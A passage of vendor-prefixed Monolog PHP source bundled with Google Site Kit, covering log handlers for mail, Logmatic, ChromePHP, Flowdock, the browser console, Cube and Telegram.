\get_class($this->handler) . ' does not support formatters.'); } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Handler; use Google\Site_Kit_Dependencies\Monolog\ResettableInterface; use Google\Site_Kit_Dependencies\Monolog\Processor\ProcessorInterface; /** * Helper trait for implementing ProcessableInterface * * @author Jordi Boggiano <j.boggiano@seld.be> * * @phpstan-import-type Record from \Monolog\Logger */ trait ProcessableHandlerTrait { /** * @var callable[] * @phpstan-var array<ProcessorInterface|callable(Record): Record> */ protected $processors = []; /** * {@inheritDoc} */ public function pushProcessor(callable $callback) : \Google\Site_Kit_Dependencies\Monolog\Handler\HandlerInterface { \array_unshift($this->processors, $callback); return $this; } /** * {@inheritDoc} */ public function popProcessor() : callable { if (!$this->processors) { throw new \LogicException('You tried to pop from an empty processor stack.'); } return \array_shift($this->processors); } /** * Processes a record. * * @phpstan-param Record $record * @phpstan-return Record */ protected function processRecord(array $record) : array { foreach ($this->processors as $processor) { $record = $processor($record); } return $record; } protected function resetProcessors() : void { foreach ($this->processors as $processor) { if ($processor instanceof \Google\Site_Kit_Dependencies\Monolog\ResettableInterface) { $processor->reset(); } } } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Handler; trait WebRequestRecognizerTrait { /** * Checks if PHP's serving a web request * @return bool */ protected function isWebRequest() : bool { return 'cli' !== \PHP_SAPI && 'phpdbg' !== \PHP_SAPI; } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Handler; use Google\Site_Kit_Dependencies\Monolog\Logger; use Google\Site_Kit_Dependencies\Monolog\Formatter\LineFormatter; /** * NativeMailerHandler uses the mail() function to send the emails * * @author Christophe Coevoet <stof@notk.org> * @author Mark Garrett <mark@moderndeveloperllc.com> */ class NativeMailerHandler extends \Google\Site_Kit_Dependencies\Monolog\Handler\MailHandler { /** * The email addresses to which the message will be sent * @var string[] */ protected $to; /** * The subject of the email * @var string */ protected $subject; /** * Optional headers for the message * @var string[] */ protected $headers = []; /** * Optional parameters for the message * @var string[] */ protected $parameters = []; /** * The wordwrap length for the message * @var int */ protected $maxColumnWidth; /** * The Content-type for the message * @var string|null */ protected $contentType; /** * The encoding for the message * @var string */ protected $encoding = 'utf-8'; /** * @param string|string[] $to The receiver of the mail * @param string $subject The subject of the mail * @param string $from The sender of the mail * @param int $maxColumnWidth The maximum column width that the message lines will have */ public function __construct($to, string $subject, string $from, $level = \Google\Site_Kit_Dependencies\Monolog\Logger::ERROR, bool $bubble = \true, int $maxColumnWidth = 70) { parent::__construct($level, $bubble); $this->to = (array) $to; $this->subject = $subject; $this->addHeader(\sprintf('From: %s', $from)); $this->maxColumnWidth = $maxColumnWidth; } /** * Add headers to the message * * @param string|string[] $headers Custom added headers */ public function addHeader($headers) : self { foreach ((array) $headers as $header) { if (\strpos($header, "\n") !== \false || \strpos($header, "\r") !== \false) { throw new \InvalidArgumentException('Headers can not contain newline characters for security reasons'); } $this->headers[] = $header; } return $this; } /** * Add parameters to the message * * @param string|string[] $parameters Custom added parameters */ public function addParameter($parameters) : self { $this->parameters = \array_merge($this->parameters, (array) $parameters); return $this; } /** * {@inheritDoc} */ protected function send(string $content, array $records) : void { $contentType = $this->getContentType() ?: ($this->isHtmlBody($content) ? 'text/html' : 'text/plain'); if ($contentType !== 'text/html') { $content = \wordwrap($content, $this->maxColumnWidth); } $headers = \ltrim(\implode("\r\n", $this->headers) . "\r\n", "\r\n"); $headers .= 'Content-type: ' . $contentType . '; charset=' . $this->getEncoding() . "\r\n"; if ($contentType === 'text/html' && \false === \strpos($headers, 'MIME-Version:')) { $headers .= 'MIME-Version: 1.0' . "\r\n"; } $subject = $this->subject; if ($records) { $subjectFormatter = new \Google\Site_Kit_Dependencies\Monolog\Formatter\LineFormatter($this->subject); $subject = $subjectFormatter->format($this->getHighestRecord($records)); } $parameters = \implode(' ', $this->parameters); foreach ($this->to as $to) { \mail($to, $subject, $content, $headers, $parameters); } } public function getContentType() : ?string { return $this->contentType; } public function getEncoding() : string { return $this->encoding; } /** * @param string $contentType The content type of the email - Defaults to text/plain. Use text/html for HTML messages. */ public function setContentType(string $contentType) : self { if (\strpos($contentType, "\n") !== \false || \strpos($contentType, "\r") !== \false) { throw new \InvalidArgumentException('The content type can not contain newline characters to prevent email header injection'); } $this->contentType = $contentType; return $this; } public function setEncoding(string $encoding) : self { if (\strpos($encoding, "\n") !== \false || \strpos($encoding, "\r") !== \false) { throw new \InvalidArgumentException('The encoding can not contain newline characters to prevent email header injection'); } $this->encoding = $encoding; return $this; } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Handler; use Google\Site_Kit_Dependencies\Monolog\Processor\ProcessorInterface; /** * Interface to describe loggers that have processors * * @author Jordi Boggiano <j.boggiano@seld.be> * * @phpstan-import-type Record from \Monolog\Logger */ interface ProcessableHandlerInterface { /** * Adds a processor in the stack. * * @psalm-param ProcessorInterface|callable(Record): Record $callback * * @param ProcessorInterface|callable $callback * @return HandlerInterface self */ public function pushProcessor(callable $callback) : \Google\Site_Kit_Dependencies\Monolog\Handler\HandlerInterface; /** * Removes the processor on top of the stack and returns it. * * @psalm-return ProcessorInterface|callable(Record): Record $callback * * @throws \LogicException In case the processor stack is empty * @return callable|ProcessorInterface */ public function popProcessor() : callable; } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Handler; use Google\Site_Kit_Dependencies\Monolog\Logger; use Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface; use Google\Site_Kit_Dependencies\Monolog\Formatter\LogmaticFormatter; /** * @author Julien Breux <julien.breux@gmail.com> */ class LogmaticHandler extends \Google\Site_Kit_Dependencies\Monolog\Handler\SocketHandler { /** * @var string */ private $logToken; /** * @var string */ private $hostname; /** * @var string */ private $appname; /** * @param string $token Log token supplied by Logmatic. * @param string $hostname Host name supplied by Logmatic. * @param string $appname Application name supplied by Logmatic. * @param bool $useSSL Whether or not SSL encryption should be used. * * @throws MissingExtensionException If SSL encryption is set to true and OpenSSL is missing */ public function __construct(string $token, string $hostname = '', string $appname = '', bool $useSSL = \true, $level = \Google\Site_Kit_Dependencies\Monolog\Logger::DEBUG, bool $bubble = \true, bool $persistent = \false, float $timeout = 0.0, float $writingTimeout = 10.0, ?float $connectionTimeout = null, ?int $chunkSize = null) { if ($useSSL && !\extension_loaded('openssl')) { throw new \Google\Site_Kit_Dependencies\Monolog\Handler\MissingExtensionException('The OpenSSL PHP extension is required to use SSL encrypted connection for LogmaticHandler'); } $endpoint = $useSSL ? 'ssl://api.logmatic.io:10515' : 'api.logmatic.io:10514'; $endpoint .= '/v1/'; parent::__construct($endpoint, $level, $bubble, $persistent, $timeout, $writingTimeout, $connectionTimeout, $chunkSize); $this->logToken = $token; $this->hostname = $hostname; $this->appname = $appname; } /** * {@inheritDoc} */ protected function generateDataStream(array $record) : string { return $this->logToken . ' ' . $record['formatted']; } /** * {@inheritDoc} */ protected function getDefaultFormatter() : \Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface { $formatter = new \Google\Site_Kit_Dependencies\Monolog\Formatter\LogmaticFormatter(); if (!empty($this->hostname)) { $formatter->setHostname($this->hostname); } if (!empty($this->appname)) { $formatter->setAppname($this->appname); } return $formatter; } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Handler\Curl; use CurlHandle; /** * This class is marked as internal and it is not under the BC promise of the package. * * @internal */ final class Util { /** @var array<int> */ private static $retriableErrorCodes = [\CURLE_COULDNT_RESOLVE_HOST, \CURLE_COULDNT_CONNECT, \CURLE_HTTP_NOT_FOUND, \CURLE_READ_ERROR, \CURLE_OPERATION_TIMEOUTED, \CURLE_HTTP_POST_ERROR, \CURLE_SSL_CONNECT_ERROR]; /** * Executes a CURL request with optional retries and exception on failure * * @param resource|CurlHandle $ch curl handler * @param int $retries * @param bool $closeAfterDone * @return bool|string @see curl_exec */ public static function execute($ch, int $retries = 5, bool $closeAfterDone = \true) { while ($retries--) { $curlResponse = \curl_exec($ch); if ($curlResponse === \false) { $curlErrno = \curl_errno($ch); if (\false === \in_array($curlErrno, self::$retriableErrorCodes, \true) || !$retries) { $curlError = \curl_error($ch); if ($closeAfterDone) { \curl_close($ch); } throw new \RuntimeException(\sprintf('Curl error (code %d): %s', $curlErrno, $curlError)); } continue; } if ($closeAfterDone) { \curl_close($ch); } return $curlResponse; } return \false; } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Handler; use Google\Site_Kit_Dependencies\Monolog\Formatter\ChromePHPFormatter; use Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface; use Google\Site_Kit_Dependencies\Monolog\Logger; use Google\Site_Kit_Dependencies\Monolog\Utils; /** * Handler sending logs to the ChromePHP extension (http://www.chromephp.com/) * * This also works out of the box with Firefox 43+ * * @author Christophe Coevoet <stof@notk.org> * * @phpstan-import-type Record from \Monolog\Logger */ class ChromePHPHandler extends \Google\Site_Kit_Dependencies\Monolog\Handler\AbstractProcessingHandler { use WebRequestRecognizerTrait; /** * Version of the extension */ protected const VERSION = '4.0'; /** * Header name */ protected const HEADER_NAME = 'X-ChromeLogger-Data'; /** * Regular expression to detect supported browsers (matches any Chrome, or Firefox 43+) */ protected const USER_AGENT_REGEX = '{\\b(?:Chrome/\\d+(?:\\.\\d+)*|HeadlessChrome|Firefox/(?:4[3-9]|[5-9]\\d|\\d{3,})(?:\\.\\d)*)\\b}'; /** @var bool */ protected static $initialized = \false; /** * Tracks whether we sent too much data * * Chrome limits the headers to 4KB, so when we sent 3KB we stop sending * * @var bool */ protected static $overflowed = \false; /** @var mixed[] */ protected static $json = ['version' => self::VERSION, 'columns' => ['label', 'log', 'backtrace', 'type'], 'rows' => []]; /** @var bool */ protected static $sendHeaders = \true; public function __construct($level = \Google\Site_Kit_Dependencies\Monolog\Logger::DEBUG, bool $bubble = \true) { parent::__construct($level, $bubble); if (!\function_exists('json_encode')) { throw new \RuntimeException('PHP\'s json extension is required to use Monolog\'s ChromePHPHandler'); } } /** * {@inheritDoc} */ public function handleBatch(array $records) : void { if (!$this->isWebRequest()) { return; } $messages = []; foreach ($records as $record) { if ($record['level'] < $this->level) { continue; } /** @var Record $message */ $message = $this->processRecord($record); $messages[] = $message; } if (!empty($messages)) { $messages = $this->getFormatter()->formatBatch($messages); self::$json['rows'] = \array_merge(self::$json['rows'], $messages); $this->send(); } } /** * {@inheritDoc} */ protected function getDefaultFormatter() : \Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface { return new \Google\Site_Kit_Dependencies\Monolog\Formatter\ChromePHPFormatter(); } /** * Creates & sends header for a record * * @see sendHeader() * @see send() */ protected function write(array $record) : void { if (!$this->isWebRequest()) { return; } self::$json['rows'][] = $record['formatted']; $this->send(); } /** * Sends the log header * * @see sendHeader() */ protected function send() : void { if (self::$overflowed || !self::$sendHeaders) { return; } if (!self::$initialized) { self::$initialized = \true; self::$sendHeaders = $this->headersAccepted(); if (!self::$sendHeaders) { return; } self::$json['request_uri'] = $_SERVER['REQUEST_URI'] ?? ''; } $json = \Google\Site_Kit_Dependencies\Monolog\Utils::jsonEncode(self::$json, \Google\Site_Kit_Dependencies\Monolog\Utils::DEFAULT_JSON_FLAGS & ~\JSON_UNESCAPED_UNICODE, \true); $data = \base64_encode($json); if (\strlen($data) > 3 * 1024) { self::$overflowed = \true; $record = ['message' => 'Incomplete logs, chrome header size limit reached', 'context' => [], 'level' => \Google\Site_Kit_Dependencies\Monolog\Logger::WARNING, 'level_name' => \Google\Site_Kit_Dependencies\Monolog\Logger::getLevelName(\Google\Site_Kit_Dependencies\Monolog\Logger::WARNING), 'channel' => 'monolog', 'datetime' => new \DateTimeImmutable(), 'extra' => []]; self::$json['rows'][\count(self::$json['rows']) - 1] = $this->getFormatter()->format($record); $json = \Google\Site_Kit_Dependencies\Monolog\Utils::jsonEncode(self::$json, \Google\Site_Kit_Dependencies\Monolog\Utils::DEFAULT_JSON_FLAGS & ~\JSON_UNESCAPED_UNICODE, \true); $data = \base64_encode($json); } if (\trim($data) !== '') { $this->sendHeader(static::HEADER_NAME, $data); } } /** * Send header string to the client */ protected function sendHeader(string $header, string $content) : void { if (!\headers_sent() && self::$sendHeaders) { \header(\sprintf('%s: %s', $header, $content)); } } /** * Verifies if the headers are accepted by the current user agent */ protected function headersAccepted() : bool { if (empty($_SERVER['HTTP_USER_AGENT'])) { return \false; } return \preg_match(static::USER_AGENT_REGEX, $_SERVER['HTTP_USER_AGENT']) === 1; } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Handler; use Google\Site_Kit_Dependencies\Monolog\Logger; use Google\Site_Kit_Dependencies\Monolog\Utils; use Google\Site_Kit_Dependencies\Monolog\Formatter\FlowdockFormatter; use Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface; /** * Sends notifications through the Flowdock push API * * This must be configured with a FlowdockFormatter instance via setFormatter() * * Notes: * API token - Flowdock API token * * @author Dominik Liebler <liebler.dominik@gmail.com> * @see https://www.flowdock.com/api/push * * @phpstan-import-type FormattedRecord from AbstractProcessingHandler * @deprecated Since 2.9.0 and 3.3.0, Flowdock was shutdown we will thus drop this handler in Monolog 4 */ class FlowdockHandler extends \Google\Site_Kit_Dependencies\Monolog\Handler\SocketHandler { /** * @var string */ protected $apiToken; /** * @throws MissingExtensionException if OpenSSL is missing */ public function __construct(string $apiToken, $level = \Google\Site_Kit_Dependencies\Monolog\Logger::DEBUG, bool $bubble = \true, bool $persistent = \false, float $timeout = 0.0, float $writingTimeout = 10.0, ?float $connectionTimeout = null, ?int $chunkSize = null) { if (!\extension_loaded('openssl')) { throw new \Google\Site_Kit_Dependencies\Monolog\Handler\MissingExtensionException('The OpenSSL PHP extension is required to use the FlowdockHandler'); } parent::__construct('ssl://api.flowdock.com:443', $level, $bubble, $persistent, $timeout, $writingTimeout, $connectionTimeout, $chunkSize); $this->apiToken = $apiToken; } /** * {@inheritDoc} */ public function setFormatter(\Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface $formatter) : \Google\Site_Kit_Dependencies\Monolog\Handler\HandlerInterface { if (!$formatter instanceof \Google\Site_Kit_Dependencies\Monolog\Formatter\FlowdockFormatter) { throw new \InvalidArgumentException('The FlowdockHandler requires an instance of Monolog\\Formatter\\FlowdockFormatter to function correctly'); } return parent::setFormatter($formatter); } /** * Gets the default formatter. */ protected function getDefaultFormatter() : \Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface { throw new \InvalidArgumentException('The FlowdockHandler must be configured (via setFormatter) with an instance of Monolog\\Formatter\\FlowdockFormatter to function correctly'); } /** * {@inheritDoc} */ protected function write(array $record) : void { parent::write($record); $this->closeSocket(); } /** * {@inheritDoc} */ protected function generateDataStream(array $record) : string { $content = $this->buildContent($record); return $this->buildHeader($content) . $content; } /** * Builds the body of API call * * @phpstan-param FormattedRecord $record */ private function buildContent(array $record) : string { return \Google\Site_Kit_Dependencies\Monolog\Utils::jsonEncode($record['formatted']['flowdock']); } /** * Builds the header of the API Call */ private function buildHeader(string $content) : string { $header = "POST /v1/messages/team_inbox/" . $this->apiToken . " HTTP/1.1\r\n"; $header .= "Host: api.flowdock.com\r\n"; $header .= "Content-Type: application/json\r\n"; $header .= "Content-Length: " . \strlen($content) . "\r\n"; $header .= "\r\n"; return $header; } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Handler; use Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface; use Google\Site_Kit_Dependencies\Monolog\Formatter\LineFormatter; use Google\Site_Kit_Dependencies\Monolog\Utils; use Google\Site_Kit_Dependencies\Monolog\Logger; use function count; use function headers_list; use function stripos; use function trigger_error; use const E_USER_DEPRECATED; /** * Handler sending logs to browser's javascript console with no browser extension required * * @author Olivier Poitrey <rs@dailymotion.com> * * @phpstan-import-type FormattedRecord from AbstractProcessingHandler */ class BrowserConsoleHandler extends \Google\Site_Kit_Dependencies\Monolog\Handler\AbstractProcessingHandler { /** @var bool */ protected static $initialized = \false; /** @var FormattedRecord[] */ protected static $records = []; protected const FORMAT_HTML = 'html'; protected const FORMAT_JS = 'js'; protected const FORMAT_UNKNOWN = 'unknown'; /** * {@inheritDoc} * * Formatted output may contain some formatting markers to be transferred to `console.log` using the %c format. * * Example of formatted string: * * You can do [[blue text]]{color: blue} or [[green background]]{background-color: green; color: white} */ protected function getDefaultFormatter() : \Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface { return new \Google\Site_Kit_Dependencies\Monolog\Formatter\LineFormatter('[[%channel%]]{macro: autolabel} [[%level_name%]]{font-weight: bold} %message%'); } /** * {@inheritDoc} */ protected function write(array $record) : void { // Accumulate records static::$records[] = $record; // Register shutdown handler if not already done if (!static::$initialized) { static::$initialized = \true; $this->registerShutdownFunction(); } } /** * Convert records to javascript console commands and send it to the browser. * This method is automatically called on PHP shutdown if output is HTML or Javascript. */ public static function send() : void { $format = static::getResponseFormat(); if ($format === self::FORMAT_UNKNOWN) { return; } if (\count(static::$records)) { if ($format === self::FORMAT_HTML) { static::writeOutput('<script>' . static::generateScript() . '</script>'); } elseif ($format === self::FORMAT_JS) { static::writeOutput(static::generateScript()); } static::resetStatic(); } } public function close() : void { self::resetStatic(); } public function reset() { parent::reset(); self::resetStatic(); } /** * Forget all logged records */ public static function resetStatic() : void { static::$records = []; } /** * Wrapper for register_shutdown_function to allow overriding */ protected function registerShutdownFunction() : void { if (\PHP_SAPI !== 'cli') { \register_shutdown_function(['Monolog\\Handler\\BrowserConsoleHandler', 'send']); } } /** * Wrapper for echo to allow overriding */ protected static function writeOutput(string $str) : void { echo $str; } /** * Checks the format of the response * * If Content-Type is set to application/javascript or text/javascript -> js * If Content-Type is set to text/html, or is unset -> html * If Content-Type is anything else -> unknown * * @return string One of 'js', 'html' or 'unknown' * @phpstan-return self::FORMAT_* */ protected static function getResponseFormat() : string { // Check content type foreach (\headers_list() as $header) { if (\stripos($header, 'content-type:') === 0) { return static::getResponseFormatFromContentType($header); } } return self::FORMAT_HTML; } /** * @return string One of 'js', 'html' or 'unknown' * @phpstan-return self::FORMAT_* */ protected static function getResponseFormatFromContentType(string $contentType) : string { // This handler only works with HTML and javascript outputs // text/javascript is obsolete in favour of application/javascript, but still used if (\stripos($contentType, 'application/javascript') !== \false || \stripos($contentType, 'text/javascript') !== \false) { return self::FORMAT_JS; } if (\stripos($contentType, 'text/html') !== \false) { return self::FORMAT_HTML; } return self::FORMAT_UNKNOWN; } private static function generateScript() : string { $script = []; foreach (static::$records as $record) { $context = static::dump('Context', $record['context']); $extra = static::dump('Extra', $record['extra']); if (empty($context) && empty($extra)) { $script[] = static::call_array(static::getConsoleMethodForLevel($record['level']), static::handleStyles($record['formatted'])); } else { $script = \array_merge($script, [static::call_array('groupCollapsed', static::handleStyles($record['formatted']))], $context, $extra, [static::call('groupEnd')]); } } return "(function (c) {if (c && c.groupCollapsed) {\n" . \implode("\n", $script) . "\n}})(console);"; } private static function getConsoleMethodForLevel(int $level) : string { return [\Google\Site_Kit_Dependencies\Monolog\Logger::DEBUG => 'debug', \Google\Site_Kit_Dependencies\Monolog\Logger::INFO => 'info', \Google\Site_Kit_Dependencies\Monolog\Logger::NOTICE => 'info', \Google\Site_Kit_Dependencies\Monolog\Logger::WARNING => 'warn', \Google\Site_Kit_Dependencies\Monolog\Logger::ERROR => 'error', \Google\Site_Kit_Dependencies\Monolog\Logger::CRITICAL => 'error', \Google\Site_Kit_Dependencies\Monolog\Logger::ALERT => 'error', \Google\Site_Kit_Dependencies\Monolog\Logger::EMERGENCY => 'error'][$level] ?? 'log'; } /** * @return string[] */ private static function handleStyles(string $formatted) : array { $args = []; $format = '%c' . $formatted; \preg_match_all('/\\[\\[(.*?)\\]\\]\\{([^}]*)\\}/s', $format, $matches, \PREG_OFFSET_CAPTURE | \PREG_SET_ORDER); foreach (\array_reverse($matches) as $match) { $args[] = '"font-weight: normal"'; $args[] = static::quote(static::handleCustomStyles($match[2][0], $match[1][0])); $pos = $match[0][1]; $format = \Google\Site_Kit_Dependencies\Monolog\Utils::substr($format, 0, $pos) . '%c' . $match[1][0] . '%c' . \Google\Site_Kit_Dependencies\Monolog\Utils::substr($format, $pos + \strlen($match[0][0])); } $args[] = static::quote('font-weight: normal'); $args[] = static::quote($format); return \array_reverse($args); } private static function handleCustomStyles(string $style, string $string) : string { static $colors = ['blue', 'green', 'red', 'magenta', 'orange', 'black', 'grey']; static $labels = []; $style = \preg_replace_callback('/macro\\s*:(.*?)(?:;|$)/', function (array $m) use($string, &$colors, &$labels) { if (\trim($m[1]) === 'autolabel') { // Format the string as a label with consistent auto assigned background color if (!isset($labels[$string])) { $labels[$string] = $colors[\count($labels) % \count($colors)]; } $color = $labels[$string]; return "background-color: {$color}; color: white; border-radius: 3px; padding: 0 2px 0 2px"; } return $m[1]; }, $style); if (null === $style) { $pcreErrorCode = \preg_last_error(); throw new \RuntimeException('Failed to run preg_replace_callback: ' . $pcreErrorCode . ' / ' . \Google\Site_Kit_Dependencies\Monolog\Utils::pcreLastErrorMessage($pcreErrorCode)); } return $style; } /** * @param mixed[] $dict * @return mixed[] */ private static function dump(string $title, array $dict) : array { $script = []; $dict = \array_filter($dict); if (empty($dict)) { return $script; } $script[] = static::call('log', static::quote('%c%s'), static::quote('font-weight: bold'), static::quote($title)); foreach ($dict as $key => $value) { $value = \json_encode($value); if (empty($value)) { $value = static::quote(''); } $script[] = static::call('log', static::quote('%s: %o'), static::quote((string) $key), $value); } return $script; } private static function quote(string $arg) : string { return '"' . \addcslashes($arg, "\"\n\\") . '"'; } /** * @param mixed $args */ private static function call(...$args) : string { $method = \array_shift($args); if (!\is_string($method)) { throw new \UnexpectedValueException('Expected the first arg to be a string, got: ' . \var_export($method, \true)); } return static::call_array($method, $args); } /** * @param mixed[] $args */ private static function call_array(string $method, array $args) : string { return 'c.' . $method . '(' . \implode(', ', $args) . ');'; } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Handler; use Google\Site_Kit_Dependencies\Monolog\Logger; use Google\Site_Kit_Dependencies\Monolog\Utils; /** * Logs to Cube. * * @link https://github.com/square/cube/wiki * @author Wan Chen <kami@kamisama.me> * @deprecated Since 2.8.0 and 3.2.0, Cube appears abandoned and thus we will drop this handler in Monolog 4 */ class CubeHandler extends \Google\Site_Kit_Dependencies\Monolog\Handler\AbstractProcessingHandler { /** @var resource|\Socket|null */ private $udpConnection = null; /** @var resource|\CurlHandle|null */ private $httpConnection = null; /** @var string */ private $scheme; /** @var string */ private $host; /** @var int */ private $port; /** @var string[] */ private $acceptedSchemes = ['http', 'udp']; /** * Create a Cube handler * * @throws \UnexpectedValueException when given url is not a valid url. * A valid url must consist of three parts : protocol://host:port * Only valid protocols used by Cube are http and udp */ public function __construct(string $url, $level = \Google\Site_Kit_Dependencies\Monolog\Logger::DEBUG, bool $bubble = \true) { $urlInfo = \parse_url($url); if ($urlInfo === \false || !isset($urlInfo['scheme'], $urlInfo['host'], $urlInfo['port'])) { throw new \UnexpectedValueException('URL "' . $url . '" is not valid'); } if (!\in_array($urlInfo['scheme'], $this->acceptedSchemes)) { throw new \UnexpectedValueException('Invalid protocol (' . $urlInfo['scheme'] . ').' . ' Valid options are ' . \implode(', ', $this->acceptedSchemes)); } $this->scheme = $urlInfo['scheme']; $this->host = $urlInfo['host']; $this->port = (int) $urlInfo['port']; parent::__construct($level, $bubble); } /** * Establish a connection to an UDP socket * * @throws \LogicException when unable to connect to the socket * @throws MissingExtensionException when there is no socket extension */ protected function connectUdp() : void { if (!\extension_loaded('sockets')) { throw new \Google\Site_Kit_Dependencies\Monolog\Handler\MissingExtensionException('The sockets extension is required to use udp URLs with the CubeHandler'); } $udpConnection = \socket_create(\AF_INET, \SOCK_DGRAM, 0); if (\false === $udpConnection) { throw new \LogicException('Unable to create a socket'); } $this->udpConnection = $udpConnection; if (!\socket_connect($this->udpConnection, $this->host, $this->port)) { throw new \LogicException('Unable to connect to the socket at ' . $this->host . ':' . $this->port); } } /** * Establish a connection to an http server * * @throws \LogicException when unable to connect to the socket * @throws MissingExtensionException when no curl extension */ protected function connectHttp() : void { if (!\extension_loaded('curl')) { throw new \Google\Site_Kit_Dependencies\Monolog\Handler\MissingExtensionException('The curl extension is required to use http URLs with the CubeHandler'); } $httpConnection = \curl_init('http://' . $this->host . ':' . $this->port . '/1.0/event/put'); if (\false === $httpConnection) { throw new \LogicException('Unable to connect to ' . $this->host . ':' . $this->port); } $this->httpConnection = $httpConnection; \curl_setopt($this->httpConnection, \CURLOPT_CUSTOMREQUEST, "POST"); \curl_setopt($this->httpConnection, \CURLOPT_RETURNTRANSFER, \true); } /** * {@inheritDoc} */ protected function write(array $record) : void { $date = $record['datetime']; $data = ['time' => $date->format('Y-m-d\\TH:i:s.uO')]; unset($record['datetime']); if (isset($record['context']['type'])) { $data['type'] = $record['context']['type']; unset($record['context']['type']); } else { $data['type'] = $record['channel']; } $data['data'] = $record['context']; $data['data']['level'] = $record['level']; if ($this->scheme === 'http') { $this->writeHttp(\Google\Site_Kit_Dependencies\Monolog\Utils::jsonEncode($data)); } else { $this->writeUdp(\Google\Site_Kit_Dependencies\Monolog\Utils::jsonEncode($data)); } } private function writeUdp(string $data) : void { if (!$this->udpConnection) { $this->connectUdp(); } \socket_send($this->udpConnection, $data, \strlen($data), 0); } private function writeHttp(string $data) : void { if (!$this->httpConnection) { $this->connectHttp(); } if (null === $this->httpConnection) { throw new \LogicException('No connection could be established'); } \curl_setopt($this->httpConnection, \CURLOPT_POSTFIELDS, '[' . $data . ']'); \curl_setopt($this->httpConnection, \CURLOPT_HTTPHEADER, ['Content-Type: application/json', 'Content-Length: ' . \strlen('[' . $data . ']')]); \Google\Site_Kit_Dependencies\Monolog\Handler\Curl\Util::execute($this->httpConnection, 5, \false); } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Handler; use RuntimeException; use Google\Site_Kit_Dependencies\Monolog\Logger; use Google\Site_Kit_Dependencies\Monolog\Utils; /** * Handler send logs to Telegram using Telegram Bot API. * * How to use: * 1) Create telegram bot with https://telegram.me/BotFather * 2) Create a telegram channel where logs will be recorded. * 3) Add created bot from step 1 to the created channel from step 2. * * Use telegram bot API key from step 1 and channel name with '@' prefix from step 2 to create instance of TelegramBotHandler * * @link https://core.telegram.org/bots/api * * @author Mazur Alexandr <alexandrmazur96@gmail.com> * * @phpstan-import-type Record from \Monolog\Logger */ class TelegramBotHandler extends \Google\Site_Kit_Dependencies\Monolog\Handler\AbstractProcessingHandler { private const BOT_API = 'https://api.telegram.org/bot'; /** * The available values of parseMode according to the Telegram api documentation */ private const AVAILABLE_PARSE_MODES = ['HTML', 'MarkdownV2', 'Markdown']; /** * The maximum number of characters allowed in a message according to the Telegram api documentation */ private const MAX_MESSAGE_LENGTH = 4096; /** * Telegram bot access token provided by BotFather. * Create telegram bot with https://telegram.me/BotFather and use access token from it. * @var string */ private $apiKey; /** * Telegram channel name. * Since to start with '@' symbol as prefix. * @var string */ private $channel; /** * The kind of formatting that is used for the message. * See available options at https://core.telegram.org/bots/api#formatting-options * or in AVAILABLE_PARSE_MODES * @var ?string */ private $parseMode; /** * Disables link previews for links in the message. * @var ?bool */ private $disableWebPagePreview; /** * Sends the message silently. Users will receive a notification with no sound. * @var ?bool */ private $disableNotification; /** * True - split a message longer than MAX_MESSAGE_LENGTH into parts and send in multiple messages. * False - truncates a message that is too long. * @var bool */ private $splitLongMessages; /** * Adds 1-second delay between sending a split message (according to Telegram API to avoid 429 Too Many Requests). * @var bool */ private $delayBetweenMessages; /** * @param string $apiKey Telegram bot access token provided by BotFather * @param string $channel Telegram channel name * @param bool $splitLongMessages Split a message longer than MAX_MESSAGE_LENGTH into parts and send in multiple messages * @param bool $delayBetweenMessages Adds delay between sending a split message according to Telegram API * @throws MissingExtensionException */ public function __construct(string $apiKey, string $channel, $level = \Google\Site_Kit_Dependencies\Monolog\Logger::DEBUG, bool $bubble = \true, ?string $parseMode = null, 